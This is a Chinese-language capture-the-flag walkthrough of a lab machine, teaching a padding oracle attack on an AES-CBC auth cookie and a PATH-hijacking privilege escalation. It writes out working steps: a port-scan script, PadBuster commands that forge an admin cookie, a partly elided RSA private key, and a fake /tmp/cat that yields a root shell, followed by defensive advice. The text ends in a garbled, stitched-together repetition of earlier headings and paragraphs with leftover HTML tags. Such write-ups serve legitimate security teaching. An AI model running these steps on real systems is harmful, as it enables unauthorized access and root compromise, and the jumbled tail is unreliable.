AES-CBC Padding Oracle攻击与PATH劫持权限提升实战教学<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标扫描<\/h3>

首先对目标IP 10.10.10.18<\/code> 进行扫描：<\/p>

ip=<\/span>'10.10.10.18'<\/span>; 
<\/span><\/span>itf=<\/span>'tun0'<\/span>; 
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span> 
<\/span><\/span>    echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>; 
<\/span><\/span>    ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>; 
<\/span><\/span>    if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span> 
<\/span><\/span>        echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>; 
<\/span><\/span>        nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>; 
<\/span><\/span>    else<\/span> 
<\/span><\/span>        echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>; 
<\/span><\/span>    fi<\/span>; 
<\/span><\/span>else<\/span> 
<\/span><\/span>    echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>; 
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp: OpenSSH 6.6.1p1 Ubuntu<\/li>
80\/tcp: Apache httpd 2.4.7 (Ubuntu)<\/li>
<\/ul>
1.2 Web应用分析<\/h3>
发现网站http:\/\/10.10.10.18\/register.php<\/code>，检查Cookie发现auth<\/code>字段：<\/p>
Cookie: auth=5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc
<\/code><\/pre>
尝试SQL注入' or '1'='1<\/code>时返回"Invalid padding"错误，表明可能使用了AES-CBC加密。<\/p>
2. Padding Oracle攻击<\/h2>
2.1 攻击原理<\/h3>
Padding Oracle攻击利用服务器对填充错误信息的不同响应，逐字节推测密文内容。攻击者通过篡改密文并观察服务器返回的padding error，逐步恢复原始明文，甚至伪造合法密文。<\/p>
2.2 攻击实施步骤<\/h3>
1. 确定区块大小<\/strong><\/p>
printf '5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc'<\/span> | base64 -d | xxd
<\/span><\/span><\/code><\/pre>输出为24字节，区块大小可能是8的倍数（8、16等）。<\/p>
2. 使用PadBuster解密<\/strong><\/p>
padbuster http:\/\/10.10.10.18\/index.php 5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc 8<\/span> -cookies auth=<\/span>5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc -encoding 0<\/span>
<\/span><\/span><\/code><\/pre>选择长度15，发现明文结构是user=xxxx<\/code>。<\/p>
3. 伪造管理员Cookie<\/strong><\/p>
padbuster http:\/\/10.10.10.18\/index.php 5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc 8<\/span> -cookies auth=<\/span>5UQg6VGqMvv8eyVEVcHgPhnnJtQXoETc -encoding 0<\/span> -plaintext user=<\/span>admin
<\/span><\/span><\/code><\/pre>得到伪造的Cookie值：<\/p>
BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
<\/code><\/pre>
3. 获取初始访问权限<\/h2>
3.1 发现SSH私钥<\/h3>
访问http:\/\/10.10.10.18\/mysshkeywithnamemitsos<\/code>获取RSA私钥：<\/p>
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqIkk7+JFhRPDbqA0D1ZB4HxS7Nn6GuEruDvTMS1EBZrUMa9r
[...省略...]
1U9sNcW9DmA==
-----END RSA PRIVATE KEY-----
<\/code><\/pre>
3.2 使用私钥SSH登录<\/h3>
chmod 600<\/span> id_rsa
<\/span><\/span>ssh mitsos@10.10.10.18 -i .\/id_rsa -o PubkeyAcceptedAlgorithms=<\/span>+ssh-rsa
<\/span><\/span><\/code><\/pre>成功登录后获取user flag：<\/p>
347284d78bc82cf3c41d5c8e3d27336a
<\/code><\/pre>
4. 权限提升：PATH劫持<\/h2>
4.1 发现备份脚本<\/h3>
在用户目录发现\/home\/mitsos\/backup<\/code>脚本，可能调用了系统命令如cat<\/code>。<\/p>
4.2 创建恶意cat程序<\/h3>
echo -e '#!\/bin\/sh\n\/bin\/sh'<\/span> > \/tmp\/cat
<\/span><\/span>chmod +x \/tmp\/cat
<\/span><\/span><\/code><\/pre>4.3 修改PATH环境变量<\/h3>
PATH=<\/span>\/tmp:$PATH
<\/span><\/span><\/code><\/pre>4.4 执行备份脚本<\/h3>
\/home\/mitsos\/backup
<\/span><\/span><\/code><\/pre>由于PATH被修改，系统会优先使用\/tmp\/cat<\/code>，从而获得root shell。<\/p>
获取root flag：<\/p>
7845959f385fc8cd21ca69bebd62d09f
<\/code><\/pre>
5. 防御措施<\/h2>
5.1 防御Padding Oracle攻击<\/h3>

使用统一的错误信息（不泄露padding有效性）<\/li>
采用认证加密模式如AES-GCM<\/li>
在解密前验证消息认证码(MAC)<\/li>
<\/ul>
5.2 防御PATH劫持<\/h3>

在脚本中使用命令的绝对路径<\/li>
设置安全的PATH环境变量<\/li>
使用.\/program<\/code>而非直接program<\/code>执行当前目录程序<\/li>
限制用户对关键目录的写权限<\/li>
<\/ul>
6. 工具与命令总结<\/h2>



工具\/命令<\/th>
用途<\/th>
<\/tr>
<\/thead>


nmap\/masscan<\/td>
端口扫描<\/td>
<\/tr>

padbuster<\/td>
Padding Oracle攻击工具<\/td>
<\/tr>

base64\/xxd<\/td>
编码转换和分析<\/td>
<\/tr>

ssh -i<\/td>
使用私钥登录<\/td>
<\/tr>

PATH修改<\/td>
环境变量劫持<\/td>
<\/tr>
<\/tbody>
<\/table>
通过本案例，我们学习了从信息收集到权限提升的完整渗透测试流程，重点掌握了Padding Oracle攻击和PATH劫持两种技术。<\/p>

工具\/命令<\/th>	用途<\/th> <\/tr> <\/thead>
nmap\/masscan<\/td>	端口扫描<\/td> <\/tr>
padbuster<\/td>	Padding Oracle攻击工具<\/td> <\/tr>
base64\/xxd<\/td>	编码转换和分析<\/td> <\/tr>
ssh -i<\/td>	使用私钥登录<\/td> <\/tr>
PATH修改<\/td>	环境变量劫持<\/td> <\/tr> <\/tbody> <\/table> 通过本案例，我们学习了从信息收集到权限提升的完整渗透测试流程，重点掌握了Padding Oracle攻击和PATH劫持两种技术。<\/p>

AES-CBC Padding Oracle攻击与PATH劫持权限提升实战教学<\/h1>

1. 信息收集阶段<\/h2>

2.1 攻击原理<\/h3> Padding Oracle攻击利用服务器对填充错误信息的不同响应，逐字节推测密文内容。攻击者通过篡改密文并观察服务器返回的padding error，逐步恢复原始明文，甚至伪造合法密文。<\/p>

3. 获取初始访问权限<\/h2>

4. 权限提升：PATH劫持<\/h2>

4.1 发现备份脚本<\/h3> 在用户目录发现\/home\/mitsos\/backup<\/code>脚本，可能调用了系统命令如cat<\/code>。<\/p>

5. 防御措施<\/h2>

2.1 攻击原理<\/h3>
Padding Oracle攻击利用服务器对填充错误信息的不同响应，逐字节推测密文内容。攻击者通过篡改密文并观察服务器返回的padding error，逐步恢复原始明文，甚至伪造合法密文。<\/p>

4.1 发现备份脚本<\/h3>
在用户目录发现`\/home\/mitsos\/backup<\/code>脚本，可能调用了系统命令如cat<\/code>。<\/p>`